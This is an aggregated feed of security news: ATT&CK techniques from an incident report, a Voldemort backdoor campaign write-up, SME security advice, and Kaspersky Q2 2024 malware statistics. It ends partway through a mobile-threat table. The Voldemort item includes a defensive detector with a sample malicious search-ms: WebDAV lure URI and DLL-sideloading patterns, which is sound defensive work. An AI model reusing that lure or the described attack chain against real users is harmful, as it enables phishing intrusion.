Resource Development | Develop Capabilities: Exploits | T1587.004
Resource Development | Develop Capabilities: Malware | T1587.001
Initial Access | Valid Accounts: Domain Accounts | T1078.002
Initial Access | Valid Accounts: Local Accounts | T1078.003
Execution | System Services: Service Execution | T1569.002
Execution | User Execution: Malicious File | T1204.002
Persistence | Create or Modify System Process: Windows Service | T1543.003
Persistence | Hijack Execution Flow: DLL Side-Loading | T1574.002
Persistence | Server Software Component: Web Shell | T1505.003
Persistence | Valid Accounts: Domain Accounts | T1078.002
Defense Evasion | Abuse Elevation Control Mechanism: Bypass User Account Control | T1548.002
Defense Evasion | Direct Volume Access | T1006
Defense Evasion | Modify Registry | T1112
Defense Evasion | Impair Defenses: Disable or Modify System Firewall | T1562.004
Defense Evasion | Impair Defenses: Disable Windows Event Logging | T1562.002
Defense Evasion | Indicator Removal: Clear Windows Event Logs | T1070.001
Defense Evasion | Indicator Removal: File Deletion | T1070.004
Defense Evasion | Impair Defenses: Impair Command History Logging | T1562.003
Command and Control | Non-Application Layer Protocol | T1095

Conclusions


Although statistics show the government sector was the most targeted vertical last year, it is clear that threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of the attackers, the best course of action is to assess your asset inventory and continue to monitor and protect it.

The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises applications creates the need to enable additional layers of monitoring based on threat intelligence. The implementation of MDR has been one of the recurring triggers for new investigations thanks to its detection capabilities and the ability of analysts to determine timely courses of action.

To learn more about our Incident Response report, we invite you to view the recording of the webinar “Analyzing last year’s cyber incident cases”.


securelist.com/incident-respon…



Portable Multi-SDR Rig Keeps Your Radios Cool



With as cheap and versatile as RTL-SDR devices are, it’s a good idea to have a couple of them on hand for some rainy day hacking. In fact, depending on what signals you’re trying to sniff out of the air, you may need multiple interfaces anyway. Once you’ve amassed this arsenal of software defined radios, you may find yourself needing a way to transport and deploy them. Luckily, [Jay Doscher] has you covered.

His latest creation, the SDR SOLO, is a modular system for mounting RTL-SDRs. Each dongle is encased in its own 3D printed frame, which not only protects it, but makes it easy to attach to the base unit. To keep the notoriously toasty radios cool, each frame has been designed to maximize airflow. You can even mount a pair of 80 mm fans to the bottom of the stack to really get the air moving. The current design is based around the RTL-SDR Blog V4, but could easily be adapted to your dongle of choice.

In addition to the row of SDR dongles, the rig also includes a powered USB hub. Each radio connects to the hub via a short USB cable, which means that you’ll only need a single USB cable running back to your computer. There’s also various mounts and adapters for attaching antennas to the system. Stick it all on the end of a tripod, and you’ve got a mobile radio monitoring system that’ll be the envy of the hackerspace.

As we’ve come to expect, [Jay] put a lot of thought and effort into the CAD side of this project. Largely made of 3D printed components, his projects often feature a rugged and professional look that really stands out.


hackaday.com/2024/09/03/portab…



Dutch data protection watchdog hits Clearview AI with €30.5 million fine for misusing facial recognition data


The Dutch Data Protection Authority (DPA) fined Clearview AI €30.5 million on Tuesday (3 September), for illegally building a database with over 30 billion photos.


euractiv.com/section/data-priv…




Back to Basics: Cybersecurity Fundamentals for SMEs (1/12)


Welcome to our series of articles on cybersecurity for small and medium-sized enterprises (SMEs)! In an increasingly digital world, information security has become a fundamental priority for every company. However, SMEs often lack the resources or the skills needed to deal adequately with cyber threats.

This 12-part series is designed to provide practical, accessible information that will help you protect your business. Each article covers a specific aspect of cybersecurity, offering useful advice, strategies and best practices to improve your security posture. From software updates to wireless network protection, from employee training to handling threats such as ransomware and phishing, we will cover all the essentials to help you keep your company safe.

Let's start with the fundamentals of cybersecurity, an essential starting point for understanding why protecting your data and devices matters. Keep following us to learn how to put these recommendations into practice and make information security an integral part of your daily business.

It doesn't matter whether you are a small artisanal biscuit company or a tech giant: cybercriminals make no distinction. You wouldn't want your little kingdom breached by some data-hungry hacker, would you? Follow these simple tips to turn your SME into a digital fortress.

Protect your files and devices

Update your software


If you think updating software is as boring as watching paint dry, think again. Automatic updates are like butter on your security toast.

[Screenshots: Windows Update; automatic app updates on Android; automatic updates on iPhone; automatic updates on Ubuntu; automatic updates on Debian]

Secure your files


Backup, backup, backup! Back up your important files offline, on an external hard drive or in the cloud. And for heaven's sake, lock your paper documents in a cabinet. Use the 3-2-1 backup rule, which is simple to explain: keep three copies of your files, one you work on and two for backup purposes. The two backup copies are kept on different media, and one of them is off-site.

[Image: the 3-2-1 backup rule. Credit: Proton]

Require strong passwords


Is your password "12345"?? Seriously? Use strong passwords on every device instead. And no, don't write them on a post-it stuck to the monitor, please!

The table below, for example, shows how long it takes to recover a password by brute force as the character set and the length of the password vary.

[Table image: brute-force time by character set and password length]

Encrypt your devices


Encrypt everything, from the laptop to the smart fridge if necessary. Sensitive data must be guarded like the Coca-Cola formula. For example, you could use a USB stick as a BitLocker startup key to lock and unlock the hard disk holding the data you need to protect.

Use multi-factor authentication (MFA)


An extra layer of security, such as a temporary code on your smartphone. Attackers will have to work much harder to steal your data. Two-factor authentication (2FA) is simply the most common form of MFA: exactly two factors. What makes authentication multi-factor is that the factors come from different categories, so a password plus a second password does not count, and a code delivered to the same device you type the password on is weaker than a separate device or hardware key. The categories are:

  • Something you know: knowledge-based factors, such as a password, require the user to remember a secret that is typed into the login page.
  • Something you have: possession-based factors require the user to hold a particular object, such as a smartphone, a smart card or a physical authentication token (such as a YubiKey).
  • Something you are: inherence-based factors identify a user by unique attributes such as fingerprints, voice prints or facial recognition.


Protect Your Wireless Network

Protect Your Router


Change the default name and password. Turn off remote management and don't forget to log out of the administrator account. The router is not a toy; treat it with respect.

Use WPA2/WPA3 Encryption


Make sure your router uses at least the WPA2 security protocol. Want to protect the information you send over your network? Fine, then turn on encryption of your transmitted data and more robust authentication with WPA3!

Smart Security Practices

Limit Login Attempts


Restrict the number of failed login attempts. Hackers shouldn't have unlimited tries at guessing your password. Configure every service you set up so that passwords can expire and login attempts are limited.
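As an added example (not code from the original post), this is one way to enforce that limit: a small sliding-window lockout that rejects an account after five failures within fifteen minutes and keeps it locked for thirty; the thresholds are assumptions to adapt to your service.

```python
"""Failed-login limiter: lock an account after too many failures in a window.

Added example, not from the original post. Thresholds (5 failures within
15 minutes, 30-minute lockout) are assumptions.
"""
from __future__ import annotations

from collections import defaultdict, deque
from dataclasses import dataclass, field


@dataclass
class LoginLimiter:
    max_failures: int = 5            # failures allowed inside the window
    window_seconds: int = 15 * 60    # sliding window over which failures count
    lockout_seconds: int = 30 * 60   # how long the account stays locked
    # per-account timestamps of recent failures, and lockout expiry times
    _failures: dict = field(default_factory=lambda: defaultdict(deque))
    _locked_until: dict = field(default_factory=dict)

    def is_locked(self, user: str, now: float) -> bool:
        until = self._locked_until.get(user)
        if until is None:
            return False
        if now >= until:
            # lockout expired: clear state so the user starts fresh
            del self._locked_until[user]
            self._failures.pop(user, None)
            return False
        return True

    def record_failure(self, user: str, now: float) -> bool:
        """Register a failed attempt; True if this one triggers a lockout."""
        q = self._failures[user]
        q.append(now)
        # forget failures that fell out of the sliding window
        while q and now - q[0] > self.window_seconds:
            q.popleft()
        if len(q) >= self.max_failures:
            self._locked_until[user] = now + self.lockout_seconds
            return True
        return False

    def record_success(self, user: str) -> None:
        self._failures.pop(user, None)

    def attempt(self, user: str, password_ok: bool, now: float) -> str:
        """Outcome of one login: 'locked', 'ok', 'failed' or 'locked_now'."""
        if self.is_locked(user, now):
            return "locked"      # reject before even checking the password
        if password_ok:
            self.record_success(user)
            return "ok"
        return "locked_now" if self.record_failure(user, now) else "failed"


def simulate(events):
    """Replay constructed (user, password_ok, timestamp) events; return outcomes."""
    limiter = LoginLimiter()
    return [limiter.attempt(u, ok, t) for u, ok, t in events]


if __name__ == "__main__":
    # constructed sample: five quick failures, then the right password
    sample = [("alice", False, t) for t in range(5)] + [("alice", True, 10.0)]
    print(simulate(sample))
```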

Train Your Staff


Yes, even your cousin who works part-time. Run regular security training sessions for all employees. Security must be part of the company culture. Topics such as social-engineering attack techniques, message authenticity, source credibility, PEC (certified e-mail) and SPID (the Italian digital identity) must be part of our basic digital skills.

Prepare a Plan


Develop a plan to save the data, keep operations running and notify customers in the event of a breach. Don't get caught unprepared like a squirrel on the highway.

To recap, these are the practical steps to follow


  • Regular Backups: Make sure backups are taken regularly and stored securely.
  • Automatic Updates: Set your systems to update automatically. You don't want to become the weak link in security.
  • Employee Training: Run regular security training sessions for all staff. Don't let ignorance be your enemy.
  • Physical Security: Lock away devices and paper files containing sensitive information. It's really not hard.
  • Multi-factor Authentication: Implement MFA wherever possible. More layers of security, fewer sleepless nights.

By following these fundamental rules, small and medium-sized businesses can significantly improve their cybersecurity posture and protect themselves from potential threats. Remember, cybersecurity is not a one-off task but an ongoing process that requires vigilance and regular updates.

The article Ritorno alle Basi: Fondamenti di Cybersecurity per le PMI (1/12) comes from il blog della sicurezza informatica.



If technology fails in the US Army exercise

From the terribly humid swamps of Louisiana, the US Army's exercises remind us of a fundamental lesson: technology is fine, but it is not enough to prevail on the battlefield. Indeed, sometimes others prevail, in spite of the latest technological advances. This is what emerges



PODCAST. Emergency in Gaza. Stefano Sozza: "The worst of crises is here"


@Notizie dall'Italia e dal mondo
After months waiting for a humanitarian permit, the Italian NGO has entered Gaza to offer basic healthcare to the population battered by the war. We interviewed the head of mission Stefano Sozza
The article PODCAST. Emergency a Gaza. Stefano Sozza:



The Voldemort Malware Exploits Google Sheets for Global Attacks


Proofpoint reports that a new malware campaign abuses Google Sheets to manage the Voldemort backdoor, which is designed to gather information and deliver additional payloads.

The attackers pose as tax authorities in Europe, Asia and the United States and have already attacked more than 70 organizations worldwide. The hackers compose the phishing e-mails so that they match the location of a given organization (for which they rely on open sources). The messages supposedly contain updated tax information and links to relevant documents.

According to the researchers' report, the campaign began on August 5, 2024 and the hackers have already sent more than 20,000 e-mails (up to 6,000 a day). The attackers target sectors such as insurance, aerospace, transport, universities, finance, technology, manufacturing, healthcare, automotive, hospitality, energy, government, media, telecommunications and so on.

It is unclear who is behind this campaign, but Proofpoint experts believe the attackers' most likely objective is cyber espionage.

Clicking the link in the e-mail takes recipients to a landing page hosted on InfinityFree, which uses Google AMP cache URLs to redirect victims to a page with a "Click to view document" button.
When the button is clicked, the page checks the browser's User-Agent and, if it is associated with Windows, redirects the victim to a search-ms URI (Windows Search Protocol) that points to a TryCloudflare-tunneled URI. Non-Windows users are redirected to an empty Google Drive URL that contains no malicious content.

If the victim interacts with the search-ms file, Windows Explorer displays an LNK or ZIP file disguised as a PDF. The use of search-ms URIs has recently become popular in phishing campaigns because a file of this kind, hosted on an external WebDAV/SMB share, appears as if it were in the local Downloads folder, enticing the victim to open it.
As a result, a Python script fetched from another WebDAV resource runs on the victim's computer and collects system information to build a profile. At the same time, a PDF file is displayed to mask the malicious activity.
The script also downloads the Cisco WebEx executable (CiscoCollabHost.exe) and a malicious DLL (CiscoSparkLauncher.dll) to load Voldemort via DLL sideloading.

Voldemort itself is a backdoor written in C that supports a wide range of commands and file actions, including data theft, dropping new payloads onto the system and deleting files.

A distinctive feature of Voldemort is that the malware uses Google Sheets as its control server, receiving new commands to run on the infected device through "Sheets" and also using them as storage for stolen data.

Thus, each infected machine writes its data to specific cells of the Google Sheet, which can be identified by unique identifiers such as a UUID, ensuring isolation and transparent management of the compromised systems.

To interact with Google Sheets, Voldemort uses the Google API with an embedded client ID and refresh token, which are stored in its encrypted settings.

As the experts note, this approach gives the malware a reliable, highly available control channel and also reduces the likelihood that this network activity is noticed by security solutions. Since Google Sheets is widely used in companies, blocking the service also seems impractical.
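From the defender's side, the two delivery traits described above (a search-ms: URI whose location is an external WebDAV share, and CiscoSparkLauncher.dll loaded by CiscoCollabHost.exe from a user-writable folder) can be turned into simple checks over endpoint telemetry. The following is an added example, not code from Proofpoint or the original post; the log lines are constructed, and their key=value layout and the internal-host allowlist are assumptions.

```python
"""Checks for the two Voldemort delivery traits: search-ms: URIs pointing at
external WebDAV shares, and CiscoSparkLauncher.dll sideloaded by
CiscoCollabHost.exe from outside the normal install directories.

Added example, not code from Proofpoint or the original post. Log lines are
constructed; the key=value layout is an assumption about your telemetry.
"""
from __future__ import annotations

import re

# Image-load events: process path and loaded module path (constructed sample).
IMAGE_LOAD_LOGS = [
    r"event=ImageLoad image=C:\Program Files\Webex\CiscoCollabHost.exe module=C:\Program Files\Webex\CiscoSparkLauncher.dll",
    r"event=ImageLoad image=C:\Users\mario\AppData\Local\Temp\CiscoCollabHost.exe module=C:\Users\mario\AppData\Local\Temp\CiscoSparkLauncher.dll",
    r"event=ImageLoad image=C:\Windows\explorer.exe module=C:\Windows\System32\shell32.dll",
]

# URL events from a proxy or EDR (constructed sample; the tunnel subdomain is made up).
URL_LOGS = [
    r"event=Url url=search-ms:query=tax-docs&crumb=location:\\abcd-efgh.trycloudflare.com@SSL\DavWWWRoot&displayname=Downloads",
    r"event=Url url=search-ms:query=report&crumb=location:C:\Users\mario\Documents",
    r"event=Url url=https://docs.google.com/spreadsheets/d/EXAMPLE",
]

INTERNAL_HOSTS = {"fileserver", "nas.corp.example"}  # assumption: your own share hosts
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")

# Values may contain spaces, so a value runs until the next ' key=' or end of line.
KV = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
SEARCH_MS_LOCATION = re.compile(r"crumb=location:([^&]+)", re.IGNORECASE)


def parse_kv(line: str) -> dict[str, str]:
    """Split a 'key=value key=value' line into a dict."""
    return {k: v for k, v in KV.findall(line)}


def search_ms_external_location(url: str) -> str | None:
    """Return the remote host when a search-ms: URI points at a UNC/WebDAV
    share outside the allowlist; None for local folders or other URLs."""
    if not url.lower().startswith("search-ms:"):
        return None
    m = SEARCH_MS_LOCATION.search(url)
    if not m:
        return None
    location = m.group(1)
    if not location.startswith("\\\\"):
        return None                       # local path such as C:\Users\...
    # '\\host@SSL\DavWWWRoot' -> 'host' (drop share path and @SSL/@port suffix)
    host = location[2:].split("\\", 1)[0].split("@", 1)[0]
    return None if host.lower() in INTERNAL_HOSTS else host


def sideload_suspect(image: str, module: str) -> bool:
    """True when CiscoCollabHost.exe loads CiscoSparkLauncher.dll from a
    directory other than the usual install locations."""
    if image.lower().rsplit("\\", 1)[-1] != "ciscocollabhost.exe":
        return False
    if module.lower().rsplit("\\", 1)[-1] != "ciscosparklauncher.dll":
        return False
    return not module.lower().startswith(TRUSTED_DIRS)


def scan(lines):
    """Run both checks over log lines; return (reason, detail) findings."""
    findings = []
    for line in lines:
        ev = parse_kv(line)
        if ev.get("event") == "ImageLoad":
            if sideload_suspect(ev.get("image", ""), ev.get("module", "")):
                findings.append(("dll-sideload", ev["module"]))
        elif ev.get("event") == "Url":
            host = search_ms_external_location(ev.get("url", ""))
            if host:
                findings.append(("search-ms-external", host))
    return findings


if __name__ == "__main__":
    for reason, detail in scan(IMAGE_LOAD_LOGS + URL_LOGS):
        print(f"{reason}: {detail}")
```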

The article Il Malware Voldemort sfrutta i Fogli di calcolo Google per Attacchi Globali comes from il blog della sicurezza informatica.



IT threat evolution in Q2 2024. Non-mobile statistics



The statistics presented here are based on detection verdicts by Kaspersky products and services received from users who consented to providing statistical data.

Quarterly figures


In Q2 2024:

  • Kaspersky solutions blocked over 664 million attacks from various internet sources.
  • The web antivirus reacted to 113.5 million unique URLs.
  • The file antivirus blocked over 27 million malicious and unwanted objects.
  • Almost 86,000 users encountered ransomware attacks.
  • Nearly 12% of all ransomware victims whose data was published on DLSs (data leak sites) were affected by the Play ransomware group.
  • Nearly 340,000 users faced miner attacks.


Ransomware

Quarterly trends and highlights
Law enforcement successes


In April 2024, a criminal who developed a packer that was allegedly used by the Conti and Lockbit groups to evade antivirus detection was arrested in Kyiv. According to Dutch police, the arrested individual was directly involved in at least one attack using the Conti ransomware in 2021. The criminal has already been charged.

In May, a member of the REvil group, arrested back in October 2021, was sentenced to 13 years in prison and ordered to pay $16 million. The cybercriminal was involved in over 2,500 REvil attacks, resulting in more than $700 million in total damages.

In June, the FBI announced that it had obtained over 7,000 decryption keys for files encrypted by Lockbit ransomware attacks. The Bureau encourages victims to contact the Internet Crime Complaint Center (IC3) at ic3.gov.

According to the UK’s National Crime Agency (NCA) and the US Department of Justice, the Lockbit group amassed up to $1 billion in its attacks from June 2022 to February 2024.

Attacks exploiting vulnerabilities


The CVE-2024-26169 privilege escalation vulnerability, patched by Microsoft in March 2024, was likely exploited in attacks by the Black Basta group. Some evidence suggests that at the time of the exploitation, this vulnerability was still unpatched, making it a zero-day vulnerability.

In June 2024, a massive TellYouThePass ransomware attack was launched, exploiting the CVE-2024-4577 vulnerability in PHP. This attack targeted Windows servers with certain PHP configurations, including those with the default XAMPP stack. The attackers scanned public IP address ranges and automatically infected vulnerable servers, demanding 0.1 BTC as ransom. Although this is a relatively small amount, the scale of the attacks could have yielded substantial profits. In recent years, this method has not been used as frequently due to its cost for attackers, who prefer instead targeted attacks with the hands-on involvement of operators. However, in this case, the attackers employed the time-tested approach.

Most active groups


Here are the most active ransomware groups based on the number of victims added to their DLSs (data leak sites). In Q2 2024, the Play group was the most active, publishing data on 12% of all new ransomware victims. Cactus came in second (7.74%), followed by Ransom Hub (7.50%).

The percentage of victims of a particular group (according to its DLS) among victims of all groups published on all DLSs examined during the reporting period

Number of new modifications


In Q2 2024, we discovered five new ransomware families and 4,456 new ransomware variants.

Number of new ransomware modifications, Q2 2023 – Q2 2024

Number of users attacked by ransomware Trojans


In Q2 2024, Kaspersky solutions protected 85,819 unique users from ransomware Trojans.

Number of unique users attacked by ransomware Trojans, Q2 2024

Geography of attacked users
Top 10 countries and territories targeted by ransomware Trojans

      Country/territory*   % of users attacked by ransomware**
  1   Pakistan             0.84%
  2   South Korea          0.72%
  3   Bangladesh           0.54%
  4   China                0.53%
  5   Iran                 0.52%
  6   Libya                0.51%
  7   Tajikistan           0.50%
  8   Mozambique           0.49%
  9   Angola               0.41%
 10   Rwanda               0.40%

*Countries and territories with fewer than 50,000 Kaspersky users were excluded from the calculations.
**Percentage of unique users whose computers were attacked by ransomware Trojans out of all unique Kaspersky product users in that country or territory.

Top 10 most common families of ransomware Trojans

      Name                 Verdicts*                                                  Share of attacked users**
  1   (generic verdict)    Trojan-Ransom.Win32.Gen                                    22.12%
  2   WannaCry             Trojan-Ransom.Win32.Wanna                                  9.51%
  3   (generic verdict)    Trojan-Ransom.Win32.Encoder                                6.94%
  4   (generic verdict)    Trojan-Ransom.Win32.Crypren                                5.42%
  5   Lockbit              Trojan-Ransom.Win32.Lockbit                                4.71%
  6   (generic verdict)    Trojan-Ransom.Win32.Agent                                  2.88%
  7   PolyRansom/VirLock   Virus.Win32.PolyRansom / Trojan-Ransom.Win32.PolyRansom    2.80%
  8   (generic verdict)    Trojan-Ransom.Win32.Phny                                   2.61%
  9   (generic verdict)    Trojan-Ransom.Win32.Crypmod                                2.58%
 10   Stop/Djvu            Trojan-Ransom.Win32.Stop                                   2.11%

*Statistics are based on detection verdicts by Kaspersky products. The information was provided by Kaspersky users who consented to providing statistical data.
**Unique Kaspersky users attacked by the ransomware Trojan family as a percentage of total users attacked by ransomware Trojans.

Miners

Number of new modifications


In Q2 2024, Kaspersky products detected 36,380 new miner variants.

Number of new miner modifications, Q2 2024

Number of users attacked by miners


In Q2 2024, we detected attacks using miners on 339,850 unique Kaspersky users worldwide.

Number of unique users attacked by miners, Q2 2024

Geography of attacked users
Top 10 countries and territories targeted by miners

      Country/territory*   % of users attacked by miners**
  1   Tajikistan           2.40%
  2   Venezuela            1.90%
  3   Kazakhstan           1.63%
  4   Ethiopia             1.58%
  5   Kyrgyzstan           1.49%
  6   Belarus              1.48%
  7   Uzbekistan           1.36%
  8   Ukraine              1.05%
  9   Panama               1.03%
 10   Mozambique           1.01%

*Countries and territories with fewer than 50,000 Kaspersky users were excluded from the calculations.
**Percentage of unique users whose computers were attacked by miners out of all unique Kaspersky product users in that country or territory.

Attacks on macOS


In Q2 2024, numerous samples of the spyware Trojan-PSW.OSX.Amos (also known as Cuckoo) were found. This spyware is notable for requesting an administrator password through osascript, displaying a phishing window. Attackers regularly update and repackage this Trojan to avoid detection.

New versions of the LightRiver/LightSpy spyware were also discovered. This Trojan downloads modules from the server with spy and backdoor functionalities. For example, they record the screen or audio, steal browser history, and execute arbitrary console commands.

Top 20 threats to macOS

The percentage of users who encountered a certain malware out of all attacked users of Kaspersky solutions for macOS

The leading active threat continues to be a Trojan capable of downloading adware or other malicious applications. Other common threats include adware and fake “system optimizers” that demand money to “fix” nonexistent issues.

Geography of threats for macOS
Top 10 countries and territories by share of attacked users

  Country/territory   Q1 2024*   Q2 2024*
  Spain               1.27%      1.14%
  Mexico              0.88%      1.09%
  Hong Kong           0.73%      0.97%
  France              0.93%      0.93%
  United States       0.81%      0.89%
  Italy               1.11%      0.87%
  United Kingdom      0.75%      0.85%
  India               0.56%      0.70%
  Germany             0.77%      0.59%
  Brazil              0.66%      0.57%

*Percentage of unique users encountering macOS threats out of all unique Kaspersky product users in that country or territory.

There has been a slight increase of 0.1–0.2 p.p. in the share of attacked users in Mexico, Hong Kong, the United Kingdom, and India. Conversely, we see a slight decline in Spain, Italy, and Germany.

IoT threat statistics


In the second quarter of 2024, the distribution of attack protocols on devices targeting Kaspersky honeypots was as follows:

Distribution of attacked services by the number of unique IP addresses of the devices carrying out the attacks, Q1–Q2 2024

The share of attacks using the Telnet protocol continued to grow, reaching 98%.

Distribution of cybercriminal sessions with Kaspersky honeypots, Q1–Q2 2024

Top 10 threats delivered to IoT devices

Share of a specific threat downloaded to an infected device as a result of a successful attack, out of the total number of downloaded threats

Attacks on IoT honeypots


For SSH protocol attacks, the share of attacks from China and India increased, while activity from South Korea slightly declined.

  SSH                  Q1 2024   Q2 2024
  China                20.58%    23.37%
  United States        12.15%    12.26%
  South Korea          9.59%     6.84%
  Singapore            6.87%     6.95%
  Germany              4.97%     4.13%
  India                4.52%     5.24%
  Hong Kong            3.25%     3.10%
  Russian Federation   2.84%     2.33%
  Brazil               2.36%     2.73%
  Japan                2.36%     1.92%

Telnet attacks from China returned to 2023 levels, while the share from India grew.

  Telnet               Q1 2024   Q2 2024
  China                41.51%    30.24%
  India                17.47%    22.68%
  Japan                4.89%     3.64%
  Brazil               3.78%     4.48%
  Russian Federation   3.12%     3.85%
  Thailand             2.95%     2.37%
  Taiwan               2.73%     2.64%
  South Korea          2.53%     2.46%
  United States        2.20%     2.66%
  Argentina            1.36%     1.76%

Attacks via web resources


The statistics in this section are based on the work of the web antivirus, which protects users at the moment malicious objects are downloaded from a malicious or infected webpage. Cybercriminals intentionally create malicious pages. Web resources with user-created content (such as forums), as well as compromised legitimate sites, can also be infected.

Countries and territories that serve as sources of web-based attacks: Top 10


The following statistics show the distribution of countries and territories that were the sources of internet attacks on users’ computers blocked by Kaspersky products (webpages with redirects to exploits, sites with exploits and other malware, botnet control centers, and so on). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2024, Kaspersky solutions blocked 664,046,455 attacks launched from online resources across the globe. A total of 113,535,455 unique URLs that triggered the web antivirus were recorded.

Distribution of web attack sources by country and territory (Q2 2024)

Countries and territories where users faced the greatest risk of online infection


To assess the risk of malware infection through the internet faced by users' computers in different countries and territories, we calculated, for each country and territory, the share of Kaspersky product users who encountered web antivirus detections during the reporting period. This data indicates the aggressiveness of the environment in which computers operate.

The following statistics are based on the detection verdicts of the web antivirus module, provided by Kaspersky product users who consented to share statistical data.

It’s important to note that only attacks involving malicious objects of the Malware class are included in this ranking. Web antivirus detections for potentially dangerous and unwanted programs, such as RiskTool and adware, were not counted.

      Country/territory*     % of attacked users**
  1   Moldova                11.3635
  2   Greece                 10.8560
  3   Qatar                  10.4018
  4   Belarus                9.8162
  5   Argentina              9.5380
  6   Bulgaria               9.4714
  7   South Africa           9.4128
  8   Sri Lanka              9.1585
  9   Kyrgyzstan             8.8852
 10   Lithuania              8.6847
 11   Tunisia                8.6739
 12   Albania                8.6586
 13   North Macedonia        8.6463
 14   Bosnia & Herzegovina   8.6291
 15   Botswana               8.6254
 16   UAE                    8.5993
 17   Germany                8.5887
 18   Slovenia               8.5851
 19   Egypt                  8.5582
 20   Canada                 8.4985

*Countries and territories with fewer than 10,000 Kaspersky users were excluded from the calculations.
**Percentage of unique users subjected to web attacks by malicious objects of the Malware class out of all unique Kaspersky product users in that country or territory.

On average during the quarter, 7.38% of the internet users’ computers worldwide were subjected to at least one Malware-category web attack.

Local threats


Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The following statistics are based on detection verdicts from the OAS (on-access scan, scanning when accessing a file) and ODS (on-demand scan, scanning launched by a user) antivirus modules, provided by Kaspersky product users who agreed to share statistical data. These statistics take into account malware found directly on users’ computers or on removable media connected to computers, such as flash drives, camera memory cards, phones, and external hard drives.

In the second quarter of 2024, our file antivirus detected 27,394,168 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection


For each country and territory, we calculated the percentage of Kaspersky users on whose computers file antivirus was triggered during the reporting period. This data reflects the level of infection of personal computers across different countries and territories worldwide.

Note that only attacks involving malicious objects of the Malware class are included in this ranking. Detections of potentially dangerous or unwanted programs such as RiskTool and adware were not counted.

      Country/territory*   % of attacked users**
  1   Turkmenistan         44.2517
  2   Afghanistan          39.4972
  3   Cuba                 38.3242
  4   Yemen                38.2295
  5   Tajikistan           37.5013
  6   Uzbekistan           32.7085
  7   Syria                31.5546
  8   Burundi              30.5511
  9   Bangladesh           28.3616
 10   South Sudan          28.3293
 11   Tanzania             28.0949
 12   Cameroon             28.0254
 13   Niger                27.9138
 14   Algeria              27.8984
 15   Benin                27.6164
 16   Myanmar              26.6960
 17   Venezuela            26.6944
 18   Iran                 26.5071
 19   Vietnam              26.3409
 20   Congo                26.3160

*Countries and territories with fewer than 10,000 Kaspersky users were excluded from the calculations.
**Percentage of unique users on whose computers local Malware-class threats were blocked, out of all unique Kaspersky product users in that country or territory.

On average, 14.2% of users’ computers worldwide encountered at least one local Malware-class threat during the second quarter.

The figure for Russia was 15.68%.


securelist.com/it-threat-evolu…



IT threat evolution in Q2 2024. Mobile statistics



Quarterly figures


According to Kaspersky Security Network, in Q2 2024:

  • 7 million attacks using malware, adware or unwanted mobile software were blocked.
  • The most common threat to mobile devices was RiskTool software – 41% of all detected threats.
  • A total of 367,418 malicious installation packages were detected, of which:
    • 13,013 packages were for mobile banking Trojans;
    • 1,392 packages were for mobile ransomware Trojans.



Quarterly highlights


The number of malware, adware or unwanted software attacks on mobile devices climbed relative to the same period last year, but dropped against Q1 2024, with 7,697,975 attacks detected.

Number of attacks on users of Kaspersky mobile solutions, Q4 2022 – Q2 2024

The decrease is due to a sharp drop in the activity of adware apps, mostly from the covert applications of the AdWare.AndroidOS.HiddenAd family, which opens ads on the targeted device.

In April of this year, new versions of Mandrake spyware were discovered. Distributed via Google Play, these apps used sophisticated techniques to hide their malicious functionality: concealing dangerous code in an obfuscated native library; using certificate pinning to detect attempts to track app network traffic; and multiple methods to check for emulated runtime environments, such as sandboxes.

A Mandrake app on Google Play

Also in Q2, the IOBot banking Trojan was found targeting users in Korea. To install an additional malware component with VNC backdoor functionality, the Trojan’s authors use a technique to bypass Android protection against granting extended permissions to apps downloaded from unofficial sources.

Mobile threat statistics


The number of Android malware samples fell against the previous quarter to the Q2 2023 level, totaling 367,418 installation packages.

Number of detected malicious installation packages, Q2 2023 – Q2 2024

New trends emerged in the distribution of detected Adware and RiskTool packages: the former significantly decreased in number, while the latter increased. Otherwise, the number of detections remains largely the same.

Distribution of detected mobile apps by type, Q1*–Q2 2024

*Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.

Among adware, the number of HiddenAd, BrowserAd and Adlo apps dropped sharply, while the number of RiskTool.AndroidOS.Fakapp apps distributed under the guise of pornographic material rose. These apps collect and forward device information to a server, then open arbitrary URLs sent back in response.

Users attacked by the malware or unwanted software as a percentage* of all targeted users of Kaspersky mobile products, Q1*–Q2 2024

*The sum may be greater than 100% if the same users encountered more than one type of attack.

Despite the prevalence of RiskTool.AndroidOS.Fakapp installation packages, the number of real users who encountered this family showed no noticeable growth. In other words, attackers released many unique samples, but their distribution was limited.

The main changes in the distribution of the share of attacked users were driven by a fall in the activity of HiddenAd adware and a rise in the activity of two RiskTool apps: Revpn and SpyLoan.

TOP 20 most frequently detected mobile malware programs


Note that the malware rankings below exclude riskware and potentially unwanted software, such as RiskTool or adware.

  Verdict                                 Prev %   New %   Difference in p.p.   Change in ranking
  DangerousObject.Multi.Generic           9.82     11.44   +1.61                +1
  DangerousObject.AndroidOS.GenericML     3.83     7.56    +3.72                +6
  Trojan.AndroidOS.Triada.ga              5.66     6.66    +1.00                +2
  Trojan.AndroidOS.Fakemoney.v            8.60     6.60    -2.00                -1
  Trojan.AndroidOS.Boogr.gsh              6.62     6.01    -0.61                -1
  Trojan.AndroidOS.Triada.fd              10.38    5.89    -4.49                -5
  Trojan.AndroidOS.Triada.gm              0.00     5.16    +5.16
  Trojan-Downloader.AndroidOS.Dwphon.a    5.26     2.71    -2.55                -2
  Trojan.AndroidOS.Generic                2.08     2.59    +0.51                +5
  Trojan.AndroidOS.Triada.gn              0.00     2.23    +2.23
  Trojan-Spy.AndroidOS.SpyNote.bz         3.52     1.97    -1.55                -2
  Trojan-Dropper.AndroidOS.Agent.sm       2.09     1.75    -0.34                +1
  Trojan.AndroidOS.Triada.gb              1.34     1.72    +0.37                +11
  Trojan.AndroidOS.Fakemoney.bj           4.26     1.47    -2.79                -7
  Trojan-Dropper.AndroidOS.Badpack.g      1.87     1.40    -0.47                +1
